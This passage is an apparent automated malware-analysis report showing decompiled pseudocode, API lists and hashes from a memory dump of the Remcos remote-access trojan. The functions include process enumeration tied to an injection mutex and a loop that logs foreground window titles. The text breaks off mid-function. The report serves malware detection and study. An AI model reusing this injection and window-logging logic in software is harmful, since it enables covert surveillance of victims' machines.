                              • Opcode Fuzzy Hash: 8b17bf4bcecabb647019a779e3dd08f50c7c3410c3c01fd7615392e0bfe9a2e3
                              • Instruction Fuzzy Hash: 1F318B316007019FEF20AA7AD846B5BB3E8EF45754F10495FE068E7291DF78AC46CB18
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040D1AD, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 186processsynchronizationCOMMON
                              Download Yara Rule
                              C-Code - Quality: 97%
                              			E0040D1AD(void* __eflags, char _a4) {
				void* _v8;
				char _v32;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v96;
				char _v120;
				char _v648;
				intOrPtr _v676;
				void* _v684;
				short _v1204;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t76;
				struct _SECURITY_ATTRIBUTES* _t106;
				char* _t111;
				void* _t158;
				void* _t161;

				_t106 = 0;
				GetModuleFileNameW(0,  &_v1204, 0x104);
				_t149 = "1";
				if(E00407746("1") != 0) {
					L14:
					L00401EDA( &_a4, _t149, _t159, E00416773(_t106,  &_v120, _t149));
					_t111 =  &_v120;
					L00401ED0();
					if(L00416F6C(_t111) != 0) {
						_push(_t111);
						if(E0040D84F( &_a4, L"Program Files\\") != 0xffffffff) {
							E0040D870(_t106,  &_a4, _t157, _t73, 0xe, L"Program Files (x86)\\");
						}
					}
					if(L0040EE85( &_v1204,  &_a4) != 0) {
						L22:
						L00401ED0();
						return _t106;
					} else {
						L18:
						_t158 = CreateMutexA(_t106, 1, "Remcos_Mutex_Inj");
						E004020B5(_t106,  &_v96);
						E00417334(L00401ECB(0x46c500),  &_v96);
						L00401F75( &_v96);
						if(L00413CCA(L00401ECB( &_a4)) == 0) {
							CloseHandle(_t158);
						} else {
							_t106 = 1;
							E004105A0(0x46c518, L00401F75(0x46c518), "Inj", 1);
						}
						L00401FA7();
						goto L22;
					}
				}
				L00401F4D(0,  &_v32);
				_t76 = CreateToolhelp32Snapshot(2, 0);
				_v8 = _t76;
				_v684 = 0x22c;
				Process32FirstW(_t76,  &_v684);
				while(Process32NextW(_v8,  &_v684) != 0) {
					E0040425F(_t106,  &_v56,  &_v648);
					_t157 = E004022EA( &_v56,  &_v60);
					_t159 = E004022AD( &_v56,  &_v64);
					E00408228( &_v72,  *((intOrPtr*)(E004022EA( &_v56,  &_v68))),  *_t84,  *_t82);
					_t161 = _t161 + 0xc;
					if(L00409EAE( &_a4) != 0) {
						L00401EDA( &_v32, _v676, _t159, L00416FD0( &_v120, _v676));
						L00401ED0();
						if(E00407746( &_v1204) == 0) {
							_t149 = 0x45f714;
							if(E00407746(0x45f714) != 0 || L00416F9A(_v676) != 0) {
								L00401ED0();
								L13:
								L00401ED0();
								goto L14;
							} else {
								L00409E58( &_v32);
								L00401ED0();
								break;
							}
						}
						L00401ED0();
						L00401ED0();
						goto L22;
					}
					L00401ED0();
				}
				CloseHandle(_v8);
				_t149 = 0x45f714;
				if(E00407746(0x45f714) != 0) {
					goto L13;
				}
				L00401ED0();
				goto L18;
			}
























                              0x0040d1c5
                              0x0040d1c8
                              0x0040d1ce
                              0x0040d1dd
                              0x0040d33e
                              0x0040d34a
                              0x0040d34f
                              0x0040d352
                              0x0040d35e
                              0x0040d360
                              0x0040d371
                              0x0040d37e
                              0x0040d37e
                              0x0040d371
                              0x0040d393
                              0x0040d40d
                              0x0040d410
                              0x0040d41d
                              0x0040d395
                              0x0040d395
                              0x0040d3a6
                              0x0040d3a8
                              0x0040d3bc
                              0x0040d3c4
                              0x0040d3de
                              0x0040d3ff
                              0x0040d3e0
                              0x0040d3e7
                              0x0040d3f5
                              0x0040d3fb
                              0x0040d408
                              0x00000000
                              0x0040d408
                              0x0040d393
                              0x0040d1e6
                              0x0040d1ee
                              0x0040d1fa
                              0x0040d1ff
                              0x0040d209
                              0x0040d270
                              0x0040d21b
                              0x0040d22c
                              0x0040d23a
                              0x0040d251
                              0x0040d256
                              0x0040d266
                              0x0040d2c1
                              0x0040d2c9
                              0x0040d2de
                              0x0040d2f5
                              0x0040d304
                              0x0040d331
                              0x0040d339
                              0x0040d339
                              0x00000000
                              0x0040d315
                              0x0040d31c
                              0x0040d324
                              0x00000000
                              0x0040d324
                              0x0040d304
                              0x0040d2e3
                              0x0040d2eb
                              0x00000000
                              0x0040d2eb
                              0x0040d26b
                              0x0040d26b
                              0x0040d287
                              0x0040d28d
                              0x0040d29f
                              0x00000000
                              0x00000000
                              0x0040d2a5
                              0x00000000

                              APIs
                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,0046C578,00000000,00000001), ref: 0040D1C8
                              • CreateToolhelp32Snapshot.KERNEL32 ref: 0040D1EE
                              • Process32FirstW.KERNEL32(00000000,?), ref: 0040D209
                              • Process32NextW.KERNEL32(0040CC11,0000022C), ref: 0040D27A
                              • CloseHandle.KERNEL32(0040CC11,?,00000000,?,?,?), ref: 0040D287
                              • CreateMutexA.KERNEL32(00000000,00000001,Remcos_Mutex_Inj,00000000), ref: 0040D39D
                              • CloseHandle.KERNEL32(00000000), ref: 0040D3FF
                                • Part of subcall function 00416FD0: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00416FE5
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: CloseCreateHandleProcess32$FileFirstModuleMutexNameNextOpenProcessSnapshotToolhelp32
                              • String ID: Inj$Program Files (x86)\$Program Files\$Remcos_Mutex_Inj
                              • API String ID: 193334293-694575909
                              • Opcode ID: c1ee45c483fb74bc2a0db2c73283c01417bd6b15af02eb149c2665c24deec1e9
                              • Instruction ID: 478cdb67a5d67a03f70ae787e2c2ba94b2730d13673da361e8ab10cc645f79f9
                              • Opcode Fuzzy Hash: c1ee45c483fb74bc2a0db2c73283c01417bd6b15af02eb149c2665c24deec1e9
                              • Instruction Fuzzy Hash: 51613F30900209AACF14EFA1D9969EE7735AF10349F50417EB816771E2EF386E4ECA59
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00447430, Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                              Download Yara Rule
                              C-Code - Quality: 97%
                              			E00447430(void* __edx, char _a4) {
				void* _v8;
				void* _v12;
				signed int _v16;
				intOrPtr* _v20;
				signed int _v24;
				char _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t105;
				char _t195;
				char _t210;
				signed int _t213;
				void* _t224;
				char* _t226;
				signed int _t227;
				signed int _t231;
				signed int _t232;
				void* _t234;
				void* _t236;
				signed int _t237;
				signed int _t238;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				char* _t257;

				_t224 = __edx;
				_t210 = _a4;
				_v16 = 0;
				_v28 = _t210;
				_v24 = 0;
				if( *((intOrPtr*)(_t210 + 0xac)) != 0 ||  *((intOrPtr*)(_t210 + 0xb0)) != 0) {
					_t234 = L0043DFD9(0, 1, 0x50);
					_v8 = _t234;
					L0043EE85(0);
					if(_t234 != 0) {
						_t227 = L0043DFD9(0, 1, 4);
						_v12 = _t227;
						L0043EE85(0);
						if(_t227 != 0) {
							if( *((intOrPtr*)(_t210 + 0xac)) == 0) {
								_t213 = 0x14;
								memcpy(_v8, 0x46a188, _t213 << 2);
								L25:
								_t236 = _v8;
								_t231 = _v16;
								 *_t236 =  *( *(_t210 + 0x88));
								 *((intOrPtr*)(_t236 + 4)) =  *((intOrPtr*)( *(_t210 + 0x88) + 4));
								 *((intOrPtr*)(_t236 + 8)) =  *((intOrPtr*)( *(_t210 + 0x88) + 8));
								 *((intOrPtr*)(_t236 + 0x30)) =  *((intOrPtr*)( *(_t210 + 0x88) + 0x30));
								 *((intOrPtr*)(_t236 + 0x34)) =  *((intOrPtr*)( *(_t210 + 0x88) + 0x34));
								 *_v12 = 1;
								if(_t231 != 0) {
									 *_t231 = 1;
								}
								goto L27;
							}
							_t232 = L0043DFD9(0, 1, 4);
							_v16 = _t232;
							L0043EE85(0);
							if(_t232 != 0) {
								_t233 =  *((intOrPtr*)(_t210 + 0xac));
								_t14 = _t234 + 0xc; // 0xc
								_t237 = E0044A26E(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t234,  &_v28, 1,  *((intOrPtr*)(_t210 + 0xac)), 0x15, _t14);
								_t238 = _t237 | E0044A26E(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t237,  &_v28, 1,  *((intOrPtr*)(_t210 + 0xac)), 0x14, _v8 + 0x10);
								_t239 = _t238 | E0044A26E(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t238,  &_v28, 1, _t233, 0x16, _v8 + 0x14);
								_t240 = _t239 | E0044A26E(_t210, _t224, _t233, _t239,  &_v28, 1, _t233, 0x17, _v8 + 0x18);
								_v20 = _v8 + 0x1c;
								_t241 = _t240 | E0044A26E(_t210, _t224, _t233, _t240,  &_v28, 1, _t233, 0x18, _v8 + 0x1c);
								_t242 = _t241 | E0044A26E(_t210, _t224, _t233, _t241,  &_v28, 1, _t233, 0x50, _v8 + 0x20);
								_t243 = _t242 | E0044A26E(_t210, _t224, _t233, _t242,  &_v28, 1, _t233, 0x51, _v8 + 0x24);
								_t244 = _t243 | E0044A26E(_t210, _t224, _t233, _t243,  &_v28, 0, _t233, 0x1a, _v8 + 0x28);
								_t245 = _t244 | E0044A26E(_t210, _t224, _t233, _t244,  &_v28, 0, _t233, 0x19, _v8 + 0x29);
								_t246 = _t245 | E0044A26E(_t210, _t224, _t233, _t245,  &_v28, 0, _t233, 0x54, _v8 + 0x2a);
								_t247 = _t246 | E0044A26E(_t210, _t224, _t233, _t246,  &_v28, 0, _t233, 0x55, _v8 + 0x2b);
								_t248 = _t247 | E0044A26E(_t210, _t224, _t233, _t247,  &_v28, 0, _t233, 0x56, _v8 + 0x2c);
								_t249 = _t248 | E0044A26E(_t210, _t224, _t233, _t248,  &_v28, 0, _t233, 0x57, _v8 + 0x2d);
								_t250 = _t249 | E0044A26E(_t210, _t224, _t233, _t249,  &_v28, 0, _t233, 0x52, _v8 + 0x2e);
								_t251 = _t250 | E0044A26E(_t210, _t224, _t233, _t250,  &_v28, 0, _t233, 0x53, _v8 + 0x2f);
								_t252 = _t251 | E0044A26E(_t210, _t224, _t233, _t251,  &_v28, 2, _t233, 0x15, _v8 + 0x38);
								_t253 = _t252 | E0044A26E(_t210, _t224, _t233, _t252,  &_v28, 2, _t233, 0x14, _v8 + 0x3c);
								_t254 = _t253 | E0044A26E(_t210, _t224, _t233, _t253,  &_v28, 2, _t233, 0x16, _v8 + 0x40);
								_t255 = _t254 | E0044A26E(_t210, _t224, _t233, _t254,  &_v28, 2, _t233, 0x17, _v8 + 0x44);
								_t256 = _t255 | E0044A26E(_t210, _t224, _t233, _t255,  &_v28, 2, _t233, 0x50, _v8 + 0x48);
								if((E0044A26E(_t210, _t224, _t233, _t256,  &_v28, 2, _t233, 0x51, _v8 + 0x4c) | _t256) == 0) {
									_t226 =  *_v20;
									while( *_t226 != 0) {
										_t195 =  *_t226;
										if(_t195 < 0x30 || _t195 > 0x39) {
											if(_t195 != 0x3b) {
												goto L17;
											}
											_t257 = _t226;
											do {
												 *_t257 =  *((intOrPtr*)(_t257 + 1));
												_t257 = _t257 + 1;
											} while ( *_t257 != 0);
										} else {
											 *_t226 = _t195 - 0x30;
											L17:
											_t226 = _t226 + 1;
										}
									}
									goto L25;
								}
								E00447332(_v8);
								L0043EE85(_v8);
								L0043EE85(_v12);
								L0043EE85(_v16);
								goto L4;
							}
							L0043EE85(_t234);
							L0043EE85(_v12);
							L7:
							goto L4;
						}
						L0043EE85(_t234);
						goto L7;
					}
					L4:
					return 1;
				} else {
					_t231 = 0;
					_v12 = 0;
					_t236 = 0x46a188;
					L27:
					_t105 =  *(_t210 + 0x84);
					if(_t105 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t210 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t105 | 0xffffffff) == 0) {
							L0043EE85( *(_t210 + 0x88));
							L0043EE85( *((intOrPtr*)(_t210 + 0x7c)));
						}
					}
					 *((intOrPtr*)(_t210 + 0x7c)) = _v12;
					 *(_t210 + 0x84) = _t231;
					 *(_t210 + 0x88) = _t236;
					return 0;
				}
			}












































                              0x00447430
                              0x00447439
                              0x00447440
                              0x00447443
                              0x00447446
                              0x0044744f
                              0x00447471
                              0x00447475
                              0x00447478
                              0x00447482
                              0x00447495
                              0x00447499
                              0x0044749c
                              0x004474a6
                              0x004474b8
                              0x0044774e
                              0x0044774f
                              0x00447751
                              0x00447759
                              0x0044775d
                              0x00447762
                              0x0044776d
                              0x00447779
                              0x00447785
                              0x00447791
                              0x00447797
                              0x0044779b
                              0x0044779d
                              0x0044779d
                              0x00000000
                              0x0044779b
                              0x004474c7
                              0x004474cb
                              0x004474ce
                              0x004474d8
                              0x004474ec
                              0x004474f2
                              0x00447507
                              0x0044751b
                              0x00447532
                              0x0044754c
                              0x00447554
                              0x00447566
                              0x0044757d
                              0x00447594
                              0x004475ae
                              0x004475c5
                              0x004475dc
                              0x004475f3
                              0x0044760d
                              0x00447624
                              0x0044763b
                              0x00447652
                              0x0044766c
                              0x00447683
                              0x0044769a
                              0x004476b1
                              0x004476cb
                              0x004476e7
                              0x00447715
                              0x00447728
                              0x00447719
                              0x0044771d
                              0x00447731
                              0x00000000
                              0x00000000
                              0x00447733
                              0x00447735
                              0x00447738
                              0x0044773a
                              0x0044773d
                              0x00447723
                              0x00447725
                              0x00447727
                              0x00447727
                              0x00447727
                              0x0044771d
                              0x00000000
                              0x0044772d
                              0x004476ed
                              0x004476f3
                              0x004476fc
                              0x00447705
                              0x00000000
                              0x0044770a
                              0x004474db
                              0x004474e4
                              0x004474ae
                              0x00000000
                              0x004474ae
                              0x004474a9
                              0x00000000
                              0x004474a9
                              0x00447484
                              0x00000000
                              0x00447459
                              0x00447459
                              0x0044745b
                              0x0044745e
                              0x0044779f
                              0x0044779f
                              0x004477a7
                              0x004477a9
                              0x004477a9
                              0x004477b1
                              0x004477b6
                              0x004477ba
                              0x004477c2
                              0x004477ca
                              0x004477d0
                              0x004477ba
                              0x004477d4
                              0x004477d9
                              0x004477df
                              0x00000000
                              0x004477df

                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: _free
                              • String ID:
                              • API String ID: 269201875-0
                              • Opcode ID: c5f37deec73d9b5cc2a4134985582e4ef4d7709f3f145db41daa550356359588
                              • Instruction ID: e6ea3b258e32db2a5a612ec849509408c7eabbb72dddc33eac43ea41aa3f9500
                              • Opcode Fuzzy Hash: c5f37deec73d9b5cc2a4134985582e4ef4d7709f3f145db41daa550356359588
                              • Instruction Fuzzy Hash: 6DC15672D45204AFEB20DBA9CC83FEE77F8AB08704F14415AFA05FB382D674994197A5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0044E57E, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMON
                              Download Yara Rule
                              C-Code - Quality: 41%
                              			E0044E57E(void* __ecx, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v5;
				char _v6;
				void* _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v36;
				signed int _v44;
				void _v48;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t114;
				signed int _t123;
				signed char _t124;
				signed int _t134;
				intOrPtr _t164;
				intOrPtr _t180;
				signed int* _t190;
				signed int _t192;
				char _t197;
				signed int _t203;
				signed int _t206;
				signed int _t215;
				signed int _t217;
				signed int _t219;
				signed int _t225;
				signed int _t227;
				signed int _t234;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed char _t242;
				intOrPtr _t245;
				void* _t248;
				void* _t252;
				void* _t262;
				signed int _t263;
				signed int _t266;
				signed int _t269;
				signed int _t270;
				void* _t272;
				void* _t274;
				void* _t275;
				void* _t277;
				void* _t278;
				void* _t280;
				void* _t284;

				_t262 = E0044E2E1(__ecx,  &_v72, _a16, _a20, _a24);
				_t192 = 6;
				memcpy( &_v48, _t262, _t192 << 2);
				_t274 = _t272 + 0x1c;
				_t248 = _t262 + _t192 + _t192;
				_t263 = _t262 | 0xffffffff;
				if(_v36 != _t263) {
					_t114 = E00447125(_t248, _t263, __eflags);
					_t190 = _a8;
					 *_t190 = _t114;
					__eflags = _t114 - _t263;
					if(_t114 != _t263) {
						_v20 = _v20 & 0x00000000;
						_v24 = 0xc;
						_t275 = _t274 - 0x18;
						 *_a4 = 1;
						_push(6);
						_v16 =  !(_a16 >> 7) & 1;
						_push( &_v24);
						_push(_a12);
						memcpy(_t275,  &_v48, 1 << 2);
						_t197 = 0;
						_t252 = E0044E24C();
						_t277 = _t275 + 0x2c;
						_v12 = _t252;
						__eflags = _t252 - 0xffffffff;
						if(_t252 != 0xffffffff) {
							L11:
							_t123 = GetFileType(_t252);
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t123 - 2;
								if(_t123 != 2) {
									__eflags = _t123 - 3;
									_t124 = _v48;
									if(_t123 == 3) {
										_t124 = _t124 | 0x00000008;
										__eflags = _t124;
									}
								} else {
									_t124 = _v48 | 0x00000040;
								}
								_v5 = _t124;
								E0044706E(_t197,  *_t190, _t252);
								_t242 = _v5 | 0x00000001;
								_v5 = _t242;
								_v48 = _t242;
								 *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) = _t242;
								_t203 =  *_t190;
								_t205 = (_t203 & 0x0000003f) * 0x30;
								__eflags = _a16 & 0x00000002;
								 *((char*)( *((intOrPtr*)(0x46b800 + (_t203 >> 6) * 4)) + 0x29 + (_t203 & 0x0000003f) * 0x30)) = 0;
								if((_a16 & 0x00000002) == 0) {
									L20:
									_v6 = 0;
									_push( &_v6);
									_push(_a16);
									_t278 = _t277 - 0x18;
									_t206 = 6;
									_push( *_t190);
									memcpy(_t278,  &_v48, _t206 << 2);
									_t134 = L0044DFFF(_t190,  &_v48 + _t206 + _t206,  &_v48);
									_t280 = _t278 + 0x30;
									__eflags = _t134;
									if(__eflags == 0) {
										 *((char*)( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x29 + ( *_t190 & 0x0000003f) * 0x30)) = _v6;
										 *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30)) & 0x00000001;
										__eflags = _v5 & 0x00000048;
										if((_v5 & 0x00000048) == 0) {
											__eflags = _a16 & 0x00000008;
											if((_a16 & 0x00000008) != 0) {
												_t225 =  *_t190;
												_t227 = (_t225 & 0x0000003f) * 0x30;
												_t164 =  *((intOrPtr*)(0x46b800 + (_t225 >> 6) * 4));
												_t87 = _t164 + _t227 + 0x28;
												 *_t87 =  *(_t164 + _t227 + 0x28) | 0x00000020;
												__eflags =  *_t87;
											}
										}
										_t266 = _v44;
										__eflags = (_t266 & 0xc0000000) - 0xc0000000;
										if((_t266 & 0xc0000000) != 0xc0000000) {
											L31:
											__eflags = 0;
											return 0;
										} else {
											__eflags = _a16 & 0x00000001;
											if((_a16 & 0x00000001) == 0) {
												goto L31;
											}
											CloseHandle(_v12);
											_v44 = _t266 & 0x7fffffff;
											_t215 = 6;
											_push( &_v24);
											_push(_a12);
											memcpy(_t280 - 0x18,  &_v48, _t215 << 2);
											_t245 = E0044E24C();
											__eflags = _t245 - 0xffffffff;
											if(_t245 != 0xffffffff) {
												_t217 =  *_t190;
												_t219 = (_t217 & 0x0000003f) * 0x30;
												__eflags = _t219;
												 *((intOrPtr*)( *((intOrPtr*)(0x46b800 + (_t217 >> 6) * 4)) + _t219 + 0x18)) = _t245;
												goto L31;
											}
											L00439DDE(GetLastError());
											 *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
											E00447237( *_t190);
											L10:
											goto L2;
										}
									}
									_t269 = _t134;
									goto L22;
								} else {
									_t269 = E0044E45D(_t205,  *_t190);
									__eflags = _t269;
									if(__eflags != 0) {
										L22:
										E0044419C(__eflags,  *_t190);
										return _t269;
									}
									goto L20;
								}
							}
							_t270 = GetLastError();
							L00439DDE(_t270);
							 *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
							CloseHandle(_t252);
							__eflags = _t270;
							if(_t270 == 0) {
								 *((intOrPtr*)(L00439E14())) = 0xd;
							}
							goto L2;
						}
						_t234 = _v44;
						__eflags = (_t234 & 0xc0000000) - 0xc0000000;
						if((_t234 & 0xc0000000) != 0xc0000000) {
							L9:
							_t235 =  *_t190;
							_t237 = (_t235 & 0x0000003f) * 0x30;
							_t180 =  *((intOrPtr*)(0x46b800 + (_t235 >> 6) * 4));
							_t33 = _t180 + _t237 + 0x28;
							 *_t33 =  *(_t180 + _t237 + 0x28) & 0x000000fe;
							__eflags =  *_t33;
							L00439DDE(GetLastError());
							goto L10;
						}
						__eflags = _a16 & 0x00000001;
						if((_a16 & 0x00000001) == 0) {
							goto L9;
						}
						_t284 = _t277 - 0x18;
						_v44 = _t234 & 0x7fffffff;
						_t239 = 6;
						_push( &_v24);
						_push(_a12);
						memcpy(_t284,  &_v48, _t239 << 2);
						_t197 = 0;
						_t252 = E0044E24C();
						_t277 = _t284 + 0x2c;
						_v12 = _t252;
						__eflags = _t252 - 0xffffffff;
						if(_t252 != 0xffffffff) {
							goto L11;
						}
						goto L9;
					} else {
						 *(L00439E01()) =  *_t186 & 0x00000000;
						 *_t190 = _t263;
						 *((intOrPtr*)(L00439E14())) = 0x18;
						goto L2;
					}
				} else {
					 *(L00439E01()) =  *_t188 & 0x00000000;
					 *_a8 = _t263;
					L2:
					return  *((intOrPtr*)(L00439E14()));
				}
			}





















































                              0x0044e5a1
                              0x0044e5a5
                              0x0044e5a6
                              0x0044e5a6
                              0x0044e5a6
                              0x0044e5a8
                              0x0044e5ae
                              0x0044e5c9
                              0x0044e5ce
                              0x0044e5d1
                              0x0044e5d3
                              0x0044e5d5
                              0x0044e5f4
                              0x0044e5fb
                              0x0044e602
                              0x0044e605
                              0x0044e611
                              0x0044e614
                              0x0044e61c
                              0x0044e61d
                              0x0044e620
                              0x0044e620
                              0x0044e627
                              0x0044e629
                              0x0044e62c
                              0x0044e634
                              0x0044e637
                              0x0044e6a4
                              0x0044e6a5
                              0x0044e6ab
                              0x0044e6ad
                              0x0044e6f6
                              0x0044e6f9
                              0x0044e702
                              0x0044e705
                              0x0044e708
                              0x0044e70a
                              0x0044e70a
                              0x0044e70a
                              0x0044e6fb
                              0x0044e6fe
                              0x0044e6fe
                              0x0044e70f
                              0x0044e712
                              0x0044e71e
                              0x0044e723
                              0x0044e72f
                              0x0044e739
                              0x0044e73d
                              0x0044e747
                              0x0044e74a
                              0x0044e755
                              0x0044e75a
                              0x0044e76a
                              0x0044e76d
                              0x0044e771
                              0x0044e772
                              0x0044e778
                              0x0044e77d
                              0x0044e780
                              0x0044e782
                              0x0044e784
                              0x0044e789
                              0x0044e78c
                              0x0044e78e
                              0x0044e7b8
                              0x0044e7dc
                              0x0044e7e0
                              0x0044e7e4
                              0x0044e7e6
                              0x0044e7ea
                              0x0044e7ec
                              0x0044e7f6
                              0x0044e7f9
                              0x0044e800
                              0x0044e800
                              0x0044e800
                              0x0044e800
                              0x0044e7ea
                              0x0044e805
                              0x0044e811
                              0x0044e813
                              0x0044e89e
                              0x0044e89e
                              0x00000000
                              0x0044e819
                              0x0044e819
                              0x0044e81d
                              0x00000000
                              0x00000000
                              0x0044e822
                              0x0044e834
                              0x0044e83c
                              0x0044e83f
                              0x0044e840
                              0x0044e843
                              0x0044e84a
                              0x0044e84f
                              0x0044e852
                              0x0044e886
                              0x0044e890
                              0x0044e890
                              0x0044e89a
                              0x00000000
                              0x0044e89a
                              0x0044e85b
                              0x0044e874
                              0x0044e87b
                              0x0044e69e
                              0x00000000
                              0x0044e69e
                              0x0044e813
                              0x0044e790
                              0x00000000
                              0x0044e75c
                              0x0044e763
                              0x0044e766
                              0x0044e768
                              0x0044e792
                              0x0044e794
                              0x00000000
                              0x0044e79a
                              0x00000000
                              0x0044e768
                              0x0044e75a
                              0x0044e6b5
                              0x0044e6b8
                              0x0044e6d3
                              0x0044e6d8
                              0x0044e6de
                              0x0044e6e0
                              0x0044e6eb
                              0x0044e6eb
                              0x00000000
                              0x0044e6e0
                              0x0044e639
                              0x0044e640
                              0x0044e642
                              0x0044e679
                              0x0044e679
                              0x0044e683
                              0x0044e686
                              0x0044e68d
                              0x0044e68d
                              0x0044e68d
                              0x0044e699
                              0x00000000
                              0x0044e699
                              0x0044e644
                              0x0044e648
                              0x00000000
                              0x00000000
                              0x0044e64a
                              0x0044e659
                              0x0044e65e
                              0x0044e661
                              0x0044e662
                              0x0044e665
                              0x0044e665
                              0x0044e66c
                              0x0044e66e
                              0x0044e671
                              0x0044e674
                              0x0044e677
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0044e5d7
                              0x0044e5dc
                              0x0044e5df
                              0x0044e5e6
                              0x00000000
                              0x0044e5e6
                              0x0044e5b0
                              0x0044e5b5
                              0x0044e5bb
                              0x0044e5bd
                              0x00000000
                              0x0044e5c2

                              APIs
                                • Part of subcall function 0044E24C: CreateFileW.KERNEL32(00000000,?,?,'D,?,?,00000000,?,0044E627,00000000,0000000C), ref: 0044E269
                              • GetLastError.KERNEL32 ref: 0044E692
                              • __dosmaperr.LIBCMT ref: 0044E699
                              • GetFileType.KERNEL32(00000000), ref: 0044E6A5
                              • GetLastError.KERNEL32 ref: 0044E6AF
                              • __dosmaperr.LIBCMT ref: 0044E6B8
                              • CloseHandle.KERNEL32(00000000), ref: 0044E6D8
                              • CloseHandle.KERNEL32(?), ref: 0044E822
                              • GetLastError.KERNEL32 ref: 0044E854
                              • __dosmaperr.LIBCMT ref: 0044E85B
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                              • String ID: H
                              • API String ID: 4237864984-2852464175
                              • Opcode ID: 83729db6a556a1019528efa5bc2c08794c0b27a863824bfcaf4dfbdb965bda8a
                              • Instruction ID: 9379966339f950b9aa3d097b32b00a291e03590e13bcb8f4c88e3fc2e04714d3
                              • Opcode Fuzzy Hash: 83729db6a556a1019528efa5bc2c08794c0b27a863824bfcaf4dfbdb965bda8a
                              • Instruction Fuzzy Hash: 8CA13732A101489FEF18EF69D8527AE7BA0EF06324F14015EF811DB391D7788D12C76A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00409197, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156sleepCOMMON
                              Download Yara Rule
                              C-Code - Quality: 89%
                              			E00409197(void* __ecx, void* __edx) {
				char _v28;
				char _v56;
				char _v76;
				char _v80;
				char _v100;
				void* _v104;
				char _v108;
				char _v112;
				struct HWND__* _v116;
				void* __ebx;
				void* __edi;
				int _t36;
				struct HWND__* _t42;
				void* _t50;
				int _t57;
				struct HWND__* _t77;
				void* _t119;
				signed int _t125;
				void* _t127;

				_t112 = __edx;
				_t127 = (_t125 & 0xfffffff8) - 0x74;
				_push(_t77);
				_push(0xea60);
				_t119 = __ecx;
				while( *((char*)(_t119 + 0x49)) != 0 ||  *((char*)(_t119 + 0x4a)) != 0) {
					Sleep(0x1f4);
					_t77 = GetForegroundWindow();
					_t36 = GetWindowTextLengthW(_t77);
					_t4 = _t36 + 1; // 0x1
					L00409DEE(_t77,  &_v100, _t112, _t119, _t4, 0);
					if(_t36 != 0) {
						_t57 = E00402469();
						GetWindowTextW(_t77, L00401ECB( &_v100), _t57);
						_t112 = 0x46dcf4;
						if(L00409EAE(0x46dcf4) == 0) {
							L00409DD4(0x46dcf4,  &_v100);
							E00407341(E00402469() - 1);
							_t127 = _t127 - 0x18;
							_t136 =  *0x46c39b;
							if( *0x46c39b == 0) {
								_t112 = L00409E6B( &_v76, L"\r\n[ ", __eflags,  &_v108);
								E00403086(_t77, _t127, _t67, _t119, __eflags, L" ]\r\n");
								L00408B82(_t119);
								L00401ED0();
							} else {
